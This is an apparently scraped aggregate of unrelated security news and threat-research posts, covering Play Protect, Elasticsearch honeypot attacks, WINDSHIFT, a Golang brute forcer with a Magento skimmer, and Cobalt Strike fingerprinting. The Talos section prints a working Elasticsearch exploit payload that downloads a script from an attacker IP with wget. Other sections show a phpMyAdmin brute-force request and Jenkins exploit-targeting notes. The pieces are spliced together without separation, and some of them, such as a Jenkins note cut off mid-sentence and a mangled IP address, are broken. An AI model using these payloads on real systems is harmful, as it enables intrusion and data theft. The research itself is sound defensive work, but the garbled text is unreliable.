Posted by Rahul Mishra and Tom Watkins, Android Security & Privacy Team
[Cross-posted from the Android Developers Blog]
In 2018, Google Play Protect made Android devices running Google Play some of the most secure smartphones available, scanning over 50 billion apps every day for harmful behaviour.
Android devices can genuinely improve people's lives through our accessibility features, Google Assistant, digital wellbeing, Family Link, and more — but we can only do this if they are safe and secure enough to earn users' long term trust. This is Google Play Protect's charter and we're encouraged by this past year's advancements.
Google Play Protect, a refresher
Google Play Protect is the technology we use to ensure that any device shipping with the Google Play Store is secured against potentially harmful applications (PHA). It is made up of a giant backend scanning engine to aid our analysts in sourcing and vetting applications made available on the Play Store, and built-in protection that scans apps on users' devices, immobilizing PHA and warning users.
This technology protects over 2 billion devices in the Android ecosystem every day.
What's new
On by default
We strongly believe that security should be a built-in feature of every device, not something a user needs to find and enable. When security features function at their best, most users do not need to be aware of them. To this end, we are pleased to announce that Google Play Protect is now enabled by default to secure all new devices, right out of the box. The user is notified that Google Play Protect is running, and has the option to turn it off whenever desired.
New and rare apps
Android is deployed in many diverse ways across many different users. We know that the ecosystem would not be as powerful and vibrant as it is today without an equally diverse array of apps to choose from. But installing new apps, especially from unknown sources, can carry risk.
Last year we launched a new feature that notifies users when they are installing apps that are new or rarely installed in the ecosystem. In these scenarios, the feature shows a warning, giving users pause to consider whether they want to trust this app, and advising them to take additional care and check the source of installation. Once Google has fully analyzed the app and determined that it is not harmful, the notification no longer displays. In 2018, this warning showed around 100,000 times per day.
Context is everything: warning users on launch
It's easy to misunderstand alerts when presented out of context. We're trained to click through notifications without reading them and get back to what we were doing as quickly as possible. We know that providing timely and context-sensitive alerts to users is critical for them to be of value. We recently enabled a security feature first introduced in Android Oreo which warns users when they are about to launch a potentially harmful app on their device.
This new warning dialog provides in-context information about which app the user is about to launch, why we think it may be harmful and what might happen if they open the app. We also provide clear guidance on what to do next. These in-context dialogs ensure users are protected even if they accidentally missed an alert.
Google Play Protect has long been able to disable the most harmful categories of apps on users’ devices automatically, providing robust protection where we believe harm will be done.
In 2018, we extended this coverage to apps installed from Play that were later found to have violated Google Play's policies, e.g. on privacy, deceptive behavior or content. These apps have been suspended and removed from the Google Play Store.
This does not remove the app from the user’s device, but it does notify the user and prevents them from opening the app accidentally. The notification gives them the option to remove the app entirely.
Keeping the Android ecosystem secure is no easy task, but we firmly believe that Google Play Protect is an important security layer that's used to protect users’ devices and their data while maintaining the freedom, diversity and openness that makes Android, well, Android.
Acknowledgements: This post leveraged contributions from Meghan Kelly and William Luh.
Christopher Evans of Cisco Talos conducted the research for this post.
Cisco Talos warns users that they need to keep a close eye on unsecured Elasticsearch clusters. We have recently observed a spike in attacks from multiple threat actors targeting these clusters. These attackers are targeting clusters using versions 1.4.2 and lower, and are leveraging old vulnerabilities to pass scripts to search queries and drop the attacker's payloads. These scripts are being leveraged to drop both malware and cryptocurrency miners on victim machines. Talos has also been able to identify social media accounts associated with one of these threat actors. Because Elasticsearch is typically used to manage very large datasets, the repercussions of a successful attack on a cluster could be devastating due to the amount of data present. This post details the attack methods used by each threat actor, as well as the associated payloads.
Through ongoing analysis of honeypot traffic, Talos detected an increase in attacks targeting unsecured Elasticsearch clusters. These attacks leverage CVE-2014-3120 and CVE-2015-1427, both of which are only present in old versions of Elasticsearch and exploit the ability to pass scripts to search queries. Based on patterns in the payloads and exploit chains, Talos assesses with moderate confidence that six distinct actors are exploiting our honeypots.
For example, an exploit for CVE-2015-1427:
"script": "java.lang.Math.class.forName(\"java.lang.Runtime\").getRuntime().exec(\"wget http://18.104.22.168:8506/IOFoqIgyC0zmf2UR/uuu.sh -P /tmp/sssooo\").getText()"
The most active of these actors consistently deploys two distinct payloads with the initial exploit, always using CVE-2015-1427. The first payload invokes wget to download a bash script, while the second payload uses obfuscated Java to invoke bash and download the same bash script with wget. This is likely an attempt to make the exploit work on a broader variety of platforms. The bash script utilized by the attacker follows a commonly observed pattern of disabling security protections and killing a variety of other malicious processes (primarily other mining malware), before placing its RSA key in the authorized_keys file. Additionally, this bash script serves to download illicit miners and their configuration files. The script achieves persistence by installing shell scripts as cron jobs.
This bash script also downloads a UPX-packed ELF executable. Analysis of the unpacked sample reveals that this executable contains exploits for a variety of other systems. These additional exploits include several vulnerabilities, all of which could lead to remote code execution, such as CVE-2018-7600 in Drupal, CVE-2017-10271 in Oracle WebLogic, and CVE-2018-1273 in Spring Data Commons. The exploits are sent, typically via HTTPS, to the targeted systems. As evidenced by each of these exploits, the attacker's goal appears to be obtaining remote code execution on targeted machines. Detailed analysis of the payload sample is ongoing, and Talos will provide pertinent updates as necessary.
Talos observed a second actor exploiting CVE-2014-3120, using it to deliver a payload that is derivative of the Bill Gates distributed denial-of-service malware. The reappearance of this malware is notable because, while Talos has previously observed this malware in our honeypots, the majority of actors have transitioned away from the DDoS malware and pivoted toward illicit miners.
A third actor attempts to download a file named "LinuxT" from an HTTP file server using exploits targeting CVE-2014-3120. The LinuxT file is no longer hosted on the command and control (C2) server despite continued exploits requesting the file, although several other malicious files are still being hosted. All of these files are detected by ClamAV as variants of the Spike trojan and are intended to run on x86, MIPS and ARM architectures.
As part of our research, we observed that, in some cases, hosts that attempted to download the "LinuxT" sample also dropped payloads that executed the command "echo 'qq952135763'". This behavior has been seen in Elasticsearch error logs going back several years. QQ is a popular Chinese social media website, and it is possible that this is referencing a QQ account. We briefly reviewed the public account activity of 952135763 and found several posts related to cybersecurity and exploitation, but nothing specific to this activity. While this information could potentially shed more light on the attacker, there is insufficient information currently to draw any firm conclusions.
Our honeypots also detected additional hosts exploiting Elasticsearch to drop payloads that execute both "echo 'qq952135763'" and "echo '952135763,'" suggesting that the attacks are related to the same QQ account. However, none of the IPs associated with these attacks have been observed attempting to download the "LinuxT" payload linked to this attacker. Additionally, unlike other activity associated with this attacker, these attacks leveraged the newer Elasticsearch vulnerability rather than the older one.
The three remaining actors that Talos identified have not been observed delivering any malware through their exploits. One actor issued an "rm *" command, while the other two actors were fingerprinting vulnerable servers by issuing 'whoami' and 'id' commands.
Talos has observed multiple attackers exploiting CVE-2014-3120 and CVE-2015-1427 in our Elasticsearch honeypots to drop a variety of malicious payloads. Additionally, Talos has identified some social media accounts we believe could belong to the threat actor dropping the "LinuxT" payload. These Elasticsearch vulnerabilities only exist in versions 1.4.2 and lower, so any cluster running a modern version of Elasticsearch is unaffected by these vulnerabilities. Given the size and sensitivity of the data sets these clusters contain, the impact of a breach of this nature could be severe. Talos urges readers to patch and upgrade to a newer version of Elasticsearch if at all possible. Additionally, Talos highly recommends disabling the ability to send scripts through search queries if that ability is not strictly necessary for your use cases.
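Since the vulnerabilities only affect Elasticsearch 1.4.2 and lower, a quick first triage step is simply checking each cluster's reported version. A minimal sketch of that check, assuming the standard root endpoint's "version.number" field and default port 9200 (host names are illustrative):

```python
# Hedged sketch: flag Elasticsearch nodes still running a version with the
# dynamic-scripting flaws described above (1.4.2 and lower). The endpoint
# layout and port are assumptions based on common defaults.
import json
import urllib.request

def is_vulnerable(version: str) -> bool:
    """Versions 1.4.2 and lower ship the exploitable scripting behavior."""
    parts = tuple(int(p) for p in version.split(".")[:3])
    return parts <= (1, 4, 2)

def check_node(host: str, port: int = 9200) -> bool:
    """Query the node's root endpoint and test its advertised version."""
    with urllib.request.urlopen(f"http://{host}:{port}/", timeout=5) as resp:
        info = json.load(resp)
    return is_vulnerable(info["version"]["number"])

print(is_vulnerable("1.4.2"))   # True  - exploitable
print(is_vulnerable("1.4.3"))   # False - patched
```

Any node flagged this way should be upgraded, and dynamic scripting disabled if it is not strictly required.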
The following SNORTⓇ rules will detect exploitation attempts. Note that additional rules may be released at a future date and current rules are subject to change pending additional vulnerability information. For the most current rule information, please refer to your Firepower Management Center or Snort.org.
CVE-2014-3120: 33830, 36256, 44690
Additional ways our customers can detect and block this threat are listed below.
Advanced Malware Protection (AMP) is ideally suited to prevent the execution of the malware used by these threat actors.
Cisco Cloud Web Security (CWS) or Web Security Appliance (WSA) web scanning prevents access to malicious websites and detects malware used in these attacks.
Email Security can block malicious emails sent by threat actors as part of their campaign.
Network Security appliances such as Next-Generation Firewall (NGFW), Next-Generation Intrusion Prevention System (NGIPS), and Meraki MX can detect malicious activity associated with this threat.
AMP Threat Grid helps identify malicious binaries and build protection into all Cisco Security products.
Umbrella, our secure internet gateway (SIG), blocks users from connecting to malicious domains, IPs, and URLs, whether users are on or off the corporate network.
Attacking IP addresses:
IP addresses and ports hosting malware:
SHA256 of delivered malware:
Attacking IP address:
IP address and port hosting malware:
SHA256 of delivered malware:
Attacking IP addresses:
IP addresses linked to QQ account, but not delivering malware:
IP address and port hosting malware:
SHA256 of malware hosted on above IP address:
7f18c8beb8e37ce41de1619b2d67eb600ace062e23ac5a5d9a9b2b3dfaccf79b
dac92c84ccbb88f058b61deadb34a511e320affa7424f3951169cba50d700500
e5a04653a3bfbac53cbb40a8857f81c8ec70927a968cb62e32fd36143a6437fc
d3447f001a6361c8454c9e560a6ca11e825ed17f63813074621846c43d6571ba
709d04dd39dd7f214f3711f7795337fbb1c2e837dddd24e6d426a0d6c306618e
830db6a2a6782812848f43a4e1229847d92a592671879ff849bc9cf08259ba6a
Attacking IP addresses:
To download old Jenkins WAR files
The first bug in the blog is a username enumeration bug in
Even though the advisory says 2.138_1, I tested against 2.138 and the exploit doesn't work.
So you are looking for Jenkins <= 2.137.
If Jenkins is really old, the above should work, and also see https://nvd.nist.gov/vuln/detail/CVE-2017-1000395, where you can get the email address via a similar query.
- versions up to (including) 2.73.1
- versions up to (including) 2.83
With 2.137 you can get the username/ID.
A recently discovered threat actor was observed targeting a Middle Eastern government agency on several occasions over the course of last year, Palo Alto Networks security researchers reveal.
Referred to as WINDSHIFT, the surveillance-focused threat actor is believed to have remained unnoticed for a long time, in part by hacking other actors and re-using their malware.
In a report from last year (PDF), Dark Matter said WINDSHIFT was observed launching sophisticated and unpredictable spear-phishing attacks against specific individuals and rarely targeting corporate environments.
The group’s Tactics, Techniques and Procedures (TTPs) were said to resemble those of Bahamut, a threat actor security researchers also linked to Urpage last year.
Following a long recon period, which could take several years, the group would attempt to steal the victim's credentials by sending fake emails prompting the victim to reset their password for Gmail, Apple iCloud, Etisalat (the main ISP in the UAE), or professional email accounts.
Should the credential harvesting fail, the actor then attempts to infect the victim with malware, also via email. The actor would then attempt to erase all traces of the attacks by shifting to a new infrastructure, gaining access to new malware, and shutting down malicious domains.
The cyber-espionage group is known to be using macOS-targeting malware, namely WINDTAIL backdoor for file exfiltration, WINDTAPE backdoor for taking screenshots, and WINDTAIL downloader for WINDTAPE. The group is also believed to be using WINDDROP, a Windows-targeting downloader.
Now, Palo Alto Networks says it has observed WINDSHIFT attacks that unfolded at a Middle Eastern government agency between January and May of 2018.
In early January 2018, an initial attack featuring a WINDTAIL sample was observed originating from the remote IP address 109.235.51[.]110 to a single internal IP address within the government agency.
The IP was associated with the domain flux2key[.]com, and the malware’s command and control (C&C) server IP address 109.235.51[.]153 was associated with the domain string2me[.]com, both known WINDSHIFT domains.
Palo Alto Networks says that several other WINDTAIL samples originating from 109.235.51[.]110 were observed being directed at the same internal IP address from January through May 2018.
All related WINDTAIL samples were Mac OSX app bundles in zip archives. One of them had C&C server IP address 185.25.50[.]189, which was associated with the domain domforworld[.]com at the time of activity.
Palo Alto Networks says it “assesses with high confidence that both the IP address 25.50[.]189 and the domain domforworld[.]com is associated with WINDSHIFT activity. Additionally, the IP addresses 109.235.51[.]110 and 109.235.51[.]153, corresponding to the previously validated WINDSHIFT domains flux2key[.]com and string2me[.]com, respectively, were also observed in use during this campaign.”
One of the attacker-owned IP addresses (109.235.50[.]191) was previously associated with Operation Hangover (which was analyzed several years ago), strengthening the previously identified relation between Operation Hangover and WINDSHIFT activity.
Palo Alto Networks also believes the attackers were unable to establish persistence within the targeted environment, given the multiple inbound WINDTAIL samples directed at the same internal IP address.
E-commerce websites continue to be targeted by online criminals looking to steal personal and payment information directly from unaware shoppers. Recently, attacks have been conducted via skimmer, which is a piece of code that is either directly injected into a hacked site or referenced externally. Its purpose is to watch for user input, in particular around online shopping carts, and send the perpetrators that data, such as credit card numbers and passwords, in clear text.
Compromising e-commerce sites can be achieved in more than one way. Vulnerabilities in popular Content Management Systems (CMSes) like Magento, as well as in various plugins are commonly exploited these days. But because many website owners still use weak passwords, brute force attacks where multiple logins are attempted are still a viable option.
Our investigation started following the discovery of many newly infected Magento websites. We pivoted on the domain name used by the skimmer and found a connection to a new piece of malware that turned out to be a brute forcer for Magento, phpMyAdmin, and cPanel. While we can't say for certain whether this is how the skimmer was injected, we believe this may be one of many campaigns currently going after e-commerce sites.
The online store is running the Magento CMS and using the OneStepCheckout library to process customers’ shopping carts. As the victim enters their address and payment details, their data is exfiltrated via a POST request with the information in Base64 format to googletagmanager[.]eu. This domain has been flagged before as part of criminal activities related to the Magecart threat groups.
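When a defender captures one of these Base64-encoded exfiltration POSTs, a quick triage step is decoding the body and checking whether any digit runs are plausible card numbers. A minimal sketch, using a Luhn check; the payload layout here is a hypothetical illustration, since real skimmer payloads vary:

```python
# Hedged triage sketch: decode a captured Base64 POST body (as described
# above) and flag digit runs that pass a Luhn check, i.e. plausible card
# numbers. The field names in the sample body are invented for illustration.
import base64
import re

def luhn_valid(number: str) -> bool:
    digits = [int(d) for d in reversed(number)]
    total = sum(digits[::2])                       # odd positions as-is
    for d in digits[1::2]:                         # double every second digit
        total += d * 2 - 9 if d * 2 > 9 else d * 2
    return total % 10 == 0

def suspicious_numbers(b64_body: bytes) -> list[str]:
    decoded = base64.b64decode(b64_body).decode("utf-8", errors="replace")
    return [run for run in re.findall(r"\d{13,19}", decoded) if luhn_valid(run)]

# Hypothetical captured body using the well-known Visa test number
body = base64.b64encode(b"cc=4111111111111111&exp=12%2F22&name=J+Doe")
print(suspicious_numbers(body))   # ['4111111111111111']
```

A hit does not prove theft on its own, but it quickly separates exfiltrated payment data from benign telemetry.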
Using VirusTotal Graph, we found a connection between this e-commerce site and a piece of malware written in Golang, more specifically a network query from the piece of malware to the compromised website. Expanding on it, we saw that the malware was dropped by yet another binary written in Delphi. Perhaps more interestingly, this opened up another large set of domains with which the malware communicates.
The first part is a downloader we detect as Trojan.WallyShack that has two layers of packing. The first layer is UPX. After unpacking it with the default UPX, we get the second layer: an underground packer using process hollowing.
The downloader is pretty simple. First, it collects some basic information about the system, and then it beacons to the C2. We can see that the domain names for the panels are hardcoded in the binary:
The main goal of this element is to download and run a payload file:
Here the dropped payload installs itself in the Startup folder by first dumping a batch script in %TEMP%, which is then deployed under the Startup folder. The sample is not packed, and looking inside, we can find artifacts indicating that it was written in Golang version 1.9. We detect this file as Trojan.StealthWorker.GO.
The reversing procedure is similar to what we have done before with another Golang sample. Looking at the functions with the prefix "main_", we can distinguish the functions that were part of the analyzed binary from those belonging to statically linked libraries.
We found several functions with the name “Brut,” suggesting this piece of malware is dedicated to brute forcing.
This is the malware sample that communicated with the aforementioned compromised e-commerce site. In the following section, we will review how communication and tasks are implemented.
Bot communication and brute forcing
Upon execution, the Golang binary will connect to 5.45.69[.]149. Checking that IP address, we can indeed see a web panel:
The bot proceeds to report that the infected computer is ready for a new task via a series of HTTP requests, announcing itself and then receiving instructions. You can see below how the bot will attempt to brute force Magento sites leveraging the /downloader/ directory point of entry:
Brute force attacks can be quite slow given the number of possible password combinations. For this reason, criminals usually leverage CMS or plugin vulnerabilities instead, as they provide a much faster return on investment. Having said that, using a botnet to perform login attempts allows threat actors to distribute the load onto a large number of workers. Given that many people are still using weak passwords for authentication, brute forcing can still be an effective method to compromise websites.
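From the defender's side, the distributed pattern described above still leaves a trail in web server logs: repeated failed POSTs to a handful of login-style paths. A minimal sketch, assuming a simplified log format and illustrative paths/thresholds:

```python
# Hedged sketch: count failed POSTs to sensitive paths per source IP to
# surface brute-force workers like the Magento "/downloader/" attempts
# described above. Log format, path list, and threshold are assumptions.
from collections import Counter

SENSITIVE = ("/downloader/", "/admin/", "/wp-login.php", "/phpmyadmin/")
THRESHOLD = 5   # failed attempts before an IP is flagged

def flag_brute_forcers(log_lines):
    """Each line: '<ip> <method> <path> <status>'; flag IPs with repeated
    failed (401/403) POSTs to login-style paths."""
    failures = Counter()
    for line in log_lines:
        ip, method, path, status = line.split()
        if method == "POST" and status in ("401", "403") \
                and path.lower().startswith(SENSITIVE):
            failures[ip] += 1
    return [ip for ip, n in failures.items() if n >= THRESHOLD]

logs = ["203.0.113.7 POST /downloader/ 401"] * 6
logs += ["198.51.100.2 GET /index.php 200"]
print(flag_brute_forcers(logs))   # ['203.0.113.7']
```

In a botnet scenario each worker stays under a per-IP threshold, so aggregating failures per targeted account or path (not only per IP) is a worthwhile refinement.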
Attack timeframe and other connections
We found many different variants of that Golang sample, the majority of them first seen in VirusTotal in early February (hashes available in the IOCs section below).
Checking on some of these other samples, we noticed that there’s more than just Magento brute forcing. Indeed, some bots are instead going after WordPress sites, for example. Whenever the bot checks back with the server, it will receive a new set of domains and passwords. Here’s an example of brute forcing phpMyAdmin:
POST: set_session=&pma_username=Root&pma_password=Administ..&server=1&target=index.php&token=
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0
As we were investigating this campaign, we saw a tweet by Willem de Groot noting a recent increase in skimmers related to googletagmanager[.]eu, tied to Adminer, a database management utility. The shopping site on which we started our research was compromised only a few days ago. Without server logs and the ability to perform a forensic investigation, we can only assume it was hacked in one of many possible scenarios, including the Adminer/MySQL flaw or brute forcing the password.
There are many different weaknesses in this ecosystem that can be exploited. From website owners not being diligent with security updates or their passwords, to end users running infected computers turned into bots and unknowingly helping to hack web portals.
As always, it is important to keep web server software up-to-date and augment this protection by using a web application firewall to fend off new attacks. There are different methods to thwart brute force attacks, including the use of the .htaccess file to restrict which IP address is allowed to log in.
Skimmers are a real problem for online shoppers who are becoming more and more wary of entering their personal information into e-commerce websites. While victims may not know where and when theft happened, it does not bode well for online merchants when their platform has been compromised.
Malwarebytes detects the malware used in these attacks and blocks the skimmer gate.
With additional contributions from @hasherezade.
Indicators of Compromise (IOCs)
snaphyteplieldup[.]xyz
tolmets[.]info
serversoftwarebase[.]com
Similar Golang bruteforcers
46fd1e8d08d06cdb9d91e2fe19a1173821dffa051315626162e9d4b38223bd4a
05073af551fd4064cced8a8b13a4491125b3cd1f08defe3d3970b8211c46e6b2
fdc3e15d2bc80b092f69f89329ff34b7b828be976e5cbe41e3c5720f7896c140
96a5b2a8fdc28b560f92937720ad0dcc5c30c705e4ce88e3f82c2a5d3ad085aa
81bd819f0feead6f7c76da3554c7669fbc294f5654a8870969eadc9700497b82
5e7581e3c8e913fe22d56a3b4b168fd5a9f3f8d9e0d2f8934f68e31a23feabd5
d87b4979c26939f0750991d331896a3a043ecd340940feb5ac6ec5a29ec7b797
36d62acd7aba4923ed71bfd4d2971f9d0f54e9445692b639175c23ff7588f0a7
7db29216bcb30307641b607577ded4a6ede08626c4fa4c29379bc36965061f62
4e18c0b316279a0a9c4d27ba785f29f4798b9bbebb43ea14ec0753574f40a54f
91a696d1a0ef2819b2ebb7664e79fa9a8e3d877bedcb5e99f05b1dc898625ed5
8b1b2dee404f274e90bd87ff6983d2162abee16c4d9868a10b802bd9bcbdbec6
046c5b18ec037ec5fbdd9be3e6ee433df3e4d2987ee59702b52d40e7f278154d
6b79345a2016b2822fd7f7bed51025b848b37e026d4638af59547e67078c913e
181ebf89a32a37752e0fc96e6020aa7af6dbb00ddb7ba02133e3804ac4d33f43
5efd1a27717d3e41281c08f8c048523e43b95300fb6023d34cb757e020f2ff7f
5dccce9b5611781c0edee4fae015119b49ce9eb99ee779e161ec0e75c1c383da
The post New Golang brute forcer discovered amid rise in e-commerce attacks appeared first on Malwarebytes Labs.
There's a new Linux security tool you should be aware of — Cmd (pronounced "see em dee") dramatically modifies the kind of control that can be exercised over Linux users. It reaches way beyond the traditional configuration of user privileges and takes an active role in monitoring and controlling the commands that users are able to run on Linux systems.
Provided by a company of the same name, Cmd focuses on cloud usage. Given the increasing number of applications being migrated into cloud environments that rely on Linux, gaps in the available tools make it difficult to adequately enforce required security. However, Cmd can also be used to manage and protect on-premises systems.
With FIDO2 certification for Android, Google is setting the stage for password-less app and website sign-ins on a billion devices
The post Google aims for password-free app and site logins on Android appeared first on WeLiveSecurity
Microsoft CEO Satya Nadella seems to agree with Apple CEO Tim Cook when it comes to privacy, calling this a “fundamental human right.”
Microsoft CEO: Privacy a 'human right'
Despite the lack of a successful smartphone franchise, Microsoft is still very much part of today’s industry with a range of services across the mobile ecosystem. That’s probably why Nadella is such an active attendee at Mobile World Congress 2019.
What’s really interesting about what he said during a speech at the show is the extent to which his thinking aligns with what Apple is doing around privacy. For example:
Ep. #47 show notes: Recorded Feb. 15, 2019
We are joined by special guest Michelle Dennedy, a vice president and the chief privacy officer at Cisco. This is a long episode that is worth every minute — covering everything from the modern privacy landscape, privacy as a fundamental human right, and all the ways you didn’t know underwear can protect you. We were a bit concerned about having a VP on, but after Michelle knocked us around a bit we figured out what was up. However, if this is the last EP you see listed, I think we all know what happened.
The topics
01:15 — Roundtable: Hi Michelle, let’s talk about Nessun dorma.
14:00 — Privacy is a fundamental human right
21:00 — The Privacy Lorax, the Privacy Nihilist, and universal identity
29:30 — Starting with morality and ethics instead of commercialization and legality
37:00 — Putting data on the balance sheet: The privenomics of information
52:00 — Who is Mitch? and the panty rules of passwords
55:00 — Michelle’s projects and book (you can get a free copy!)
1:01:30 — Can security and laws keep pace with privacy needs?
1:10:00 — Give me back my OJ, Senator.
1:13:00 — My dudes, Mitch Pinkerton rides again
1:17:00 — More cover fire: The rest of the underwear rules
1:20:00 — Closing thoughts and parting shots
The links
Marc Martel, "The Mercurotti"
Okamoto Tomotaka, Nessun dorma
David the Hairdresser, Nessun dorma
Aretha Franklin, Nessun dorma
Privacy Engineer’s Manifesto (also free for Kindle and Nook)
Cisco calls for privacy as a basic human right
Cisco Trust Center
Special Guest: Michelle Dennedy, VP and Chief Privacy Officer at Cisco (@mdennedy)
Featuring: Craig Williams (@Security_Craig), Joel Esler (@JoelEsler), Matt Olney (@kpyke) and Nigel Houghton (@EnglishLFC).
Hosted by Mitch Neff (@MitchNeff).
Find all episodes here.
Subscribe via iTunes (and leave a review!)
Check out the Talos Threat Research Blog
Subscribe to the Threat Source newsletter
Follow Talos on Twitter
Give us your feedback and suggestions for topics:
How an anomalous space led to fingerprinting
On the 2nd of January 2019, Cobalt Strike version 3.13 was released, containing a fix for an “extraneous space”. This uncommon whitespace in its server responses is one of the characteristics Fox-IT has been leveraging to identify Cobalt Strike servers, with high confidence, for the past year and a half. In this blog we publish a full list of servers for readers to check against the logging and security controls of their infrastructure.
Cobalt Strike is a framework designed for adversary simulation. It is commonly used by penetration testers and red teamers to test an organization’s resilience against targeted attacks, but has been adopted by an ever increasing number of malicious threat actors.
Subtle anomalies like these should not be underestimated by blue teams when it comes to combating malicious activity.
About Cobalt Strike
Cobalt Strike is a framework designed for adversary simulation. It is commonly used by penetration testers and red teamers to test an organization’s resilience against targeted attacks. It can be configured using Malleable C&C profiles, which customize the behavior of its beacon, giving users the ability to emulate the TTPs of in-the-wild threat actors. The framework is commercially and publicly available, which has also led to pirated/cracked versions of the software.
Though Cobalt Strike is designed for adversary simulation, somewhat ironically the framework has been adopted by an ever increasing number of malicious threat actors: from financially motivated criminals such as Navigator/FIN7, to state-affiliated groups motivated by political espionage such as APT29. In recent years, both red teams and threat actors have increasingly made use of publicly and commercially available hacking tools. A major reason for this is likely their ease of use and scalability. This two-sided element of pentesting suites makes it a critical avenue for threat research.
Cobalt Strike Team Servers
While the implant component of Cobalt Strike is called the “beacon”, the server component is referred to as the “team server”. The server is written in Java and operators can connect to it to manage and interact with the Cobalt Strike beacons using a GUI. On top of collaboration, the team server also acts as a webserver where the beacons connect to for Command & Control, but it can also be configured to serve the beacon payload, landing pages and arbitrary files.
Communication to these servers can be fingerprinted with the use of Intrusion Detection System (IDS) signatures such as Snort, but with enough customization of the beacon, and/or usage of a custom TLS certificate, this becomes troublesome. However, by applying other fingerprinting techniques (as described in the next section) a more accurate picture of the Cobalt Strike team servers that are publicly reachable can be painted.
Identifying Cobalt Strike Team Servers
One of Fox-IT’s InTELL analysts, with a trained eye for HTTP header anomalies, spotted an unusual space in the response of a Cobalt Strike team server in one of our global investigations into malicious activity. Though this might seem irrelevant to a casual observer, details such as these can make a substantial difference in combating malicious activity, and warranted additional research into the set-up of the team servers. This ultimately led to Fox-IT being able to better protect our clients from actors using Cobalt Strike.
The webserver of the team server in Cobalt Strike is based on NanoHTTPD, an open-source webserver written in Java. However, this webserver unintentionally returns a surplus whitespace in all its HTTP responses. It is difficult to see at first glance, but the whitespace is there in all the HTTP responses from the Cobalt Strike webserver:
Using this knowledge it is possible to identify NanoHTTPD servers, including possible Cobalt Strike team servers. We found out that public NanoHTTPD servers are less common than team servers. Even when the team server uses a Malleable C2 Profile, it is still possible to identify the server due to the “extraneous space”.
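The check itself is simple enough to sketch: request a page and inspect the raw status line for the surplus trailing space. A hedged illustration; the exact placement of the space follows public write-ups of this anomaly, and the function here is a sketch rather than a production scanner:

```python
# Hedged sketch of the fingerprint described above: NanoHTTPD-based servers
# (pre-3.13 Cobalt Strike team servers among them) return an extra space at
# the end of the HTTP status line. Inspecting the raw first line of the
# response is one way to check for it.
import socket

def status_line_has_trailing_space(host: str, port: int = 80) -> bool:
    with socket.create_connection((host, port), timeout=5) as s:
        s.sendall(b"GET / HTTP/1.1\r\nHost: " + host.encode() + b"\r\n\r\n")
        raw = s.recv(4096)
    first_line = raw.split(b"\r\n", 1)[0]
    # e.g. b"HTTP/1.1 200 OK " <- note the surplus trailing space
    return first_line.endswith(b" ")

# Offline check of the parsing logic against a canned response:
canned = b"HTTP/1.1 200 OK \r\nContent-Type: text/html\r\n\r\n"
print(canned.split(b"\r\n", 1)[0].endswith(b" "))   # True
```

Note that a raw socket is used deliberately: most HTTP client libraries normalize the status line, which would silently erase the very anomaly being fingerprinted.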
The “extraneous space” was fixed in Cobalt Strike 3.13, released on January 2nd of 2019. This means that this characteristic was in Cobalt Strike for almost 7 years, assuming it used NanoHTTPD since the first version, released in 2012. If you look carefully, you can also spot the space in some of the author’s original YouTube videos, dating back to 2014.
The fact that the removal of this space is documented in the change log leads us to believe that the Cobalt Strike developers have become aware of the implications of such a space in the server response, and its potential value to blue teams.
The change log entry highlighted above refers to the removed space as “extraneous”, in a literal sense meaning not pertinent or irrelevant. Given its demonstrated significance as a fingerprinting mechanism, that description is contested here.
Scanning and results
By utilizing public scan data, such as Rapid7 Labs Open Data, and the knowledge of how to fingerprint NanoHTTPD servers, we can historically identify the state of publicly reachable team servers on the Internet.
The graph shows a steady growth of Cobalt Strike (NanoHTTPD) webservers on ports 80 and 443, which is a good indication of the increasing popularity of this framework. The decline since the start of 2019 is most likely due to the “extraneous space” fix, meaning patched servers no longer show up in the scan data when applying the fingerprint.
In total, Fox-IT has observed 7,718 unique Cobalt Strike team server or NanoHTTPD hosts between January 2015 and February 2019, based on the Rapid7 Labs HTTP and HTTPS Sonar datasets (as of February 26, 2019).
The table below contains several examples of Cobalt Strike team servers, used by malicious threat actors:
| IP Address | First seen | Last seen | Actor |
The full list of Cobalt Strike team servers identified using this method can be found on the following Fox-IT GitHub Repository.
Do note that possible legitimate NanoHTTPD servers are listed here and that some IP addresses may have been rotated and reused swiftly, for example due to being part of Amazon or Azure cloud infrastructure.
Therefore, we recommend investigating connections to these IP addresses within the corresponding time ranges. A starting point is to verify whether a requested URI matches a Cobalt Strike beacon checksum, or to review historical resolutions using passive DNS. Going beyond this can be done in various ways, and we challenge readers to use their investigative creativity.
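One commonly documented beacon-checksum heuristic is the "checksum8" scheme used by Metasploit-style stagers, where the ASCII sum of the URI (without the leading slash) mod 256 hits a magic value. A hedged sketch, treating this strictly as a triage aid rather than proof of Cobalt Strike activity:

```python
# Hedged sketch: "checksum8" staging-URI heuristic. The ASCII sum of the
# URI path (leading slash stripped) mod 256 equals 92 for x86 payload
# requests and 93 for x64, per public documentation of Metasploit-style
# stagers. A match is a triage signal, not proof.
def checksum8(uri: str) -> int:
    return sum(ord(c) for c in uri.lstrip("/")) % 256

def looks_like_stager_uri(uri: str) -> bool:
    return checksum8(uri) in (92, 93)   # x86 / x64 stager magic values

print(looks_like_stager_uri("/aaa9"))        # True: 97+97+97+57 = 348 % 256 = 92
print(looks_like_stager_uri("/index.html"))  # False
```

Running this over proxy-log URIs requested from the listed IP addresses is a cheap way to prioritize which connections deserve a closer look.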
Please also note that this list contains servers of both legitimate and illegitimate operations, since these cannot be distinguished easily. Fox-IT recognizes the merit of building and distributing offensive tooling, particularly for security testing purposes. In our opinion the benefits of publishing this list (allowing everyone to detect unwanted attacks retroactively) outweigh the downsides, which could include potentially affecting ongoing red team operations. We believe that we all have an interest in raising the bar of security operations, and therefore increasing visibility across the board will inform a higher level of operational security and awareness on all sides.
Network IDS Signatures
Fox-IT developed a Snort rule for network detection. The rule checks for the “extraneous space” in the HTTP header. Please note that this detection rule only works on plaintext HTTP traffic to and from Cobalt Strike team servers running versions up to release 3.13. Nevertheless, this is still a valuable detection rule, considering threat actors tend to use pirated and cracked (and therefore inherently unsupported) versions.
- Organizations are encouraged to use the published list with Cobalt Strike team servers IP addresses to retroactively verify whether they have been targeted with this tooling by either a red team or an adversary in the recent past. The IP addresses can be checked with e.g. firewall and proxy logs, or on aggregate against SIEM data. To minimize the amount of false positives, the reader is urged to take the corresponding first and last seen dates into consideration.
